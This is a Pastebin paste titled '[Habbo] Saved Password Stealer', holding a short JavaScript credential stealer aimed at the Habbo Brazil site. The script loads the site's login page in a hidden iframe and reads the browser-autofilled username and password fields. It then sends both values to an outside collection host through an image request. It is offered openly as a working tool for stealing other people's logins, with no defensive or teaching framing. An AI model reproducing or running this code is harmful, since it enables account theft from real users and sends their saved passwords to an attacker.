nPhoenix

[Habbo] Saved Password Stealer

Nov 20th, 2012
590
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. /*
  2. #############################
  3. # Saved Password Stealer 2.1
  4. # By phoenix (phnx_wc@hotmail.com)
  5. # Não copie noob! Quem sabe arrumar sabe, quem não sabe se fodeu. ;*
  6. # (c) 2012
  7. ##############################
  8. */
  9. FRM = new Date().getTime();
  10. d = document;
  11. x = document.createElement("iframe");
  12. x.src = "http://www.habbo.com.br/quickregister/login";
  13. x.id = FRM;
  14. username = null;
  15. password = null;
  16. $$("head")[0].appendChild(x);
  17. x.onload = function () {
  18.     username = d.getElementById(FRM).contentWindow.document.getElementById("login-username").value;
  19.     password = d.getElementById(FRM).contentWindow.document.getElementById("login-password").value;
  20.     if (!username && !password) {
  21.         return false;
  22.     };
  23.     new Image().src = "http://site.com/ctk.php?u=" + escape(username) + "&p=" + escape(password);
  24. };
Add Comment
Please, Sign In to add comment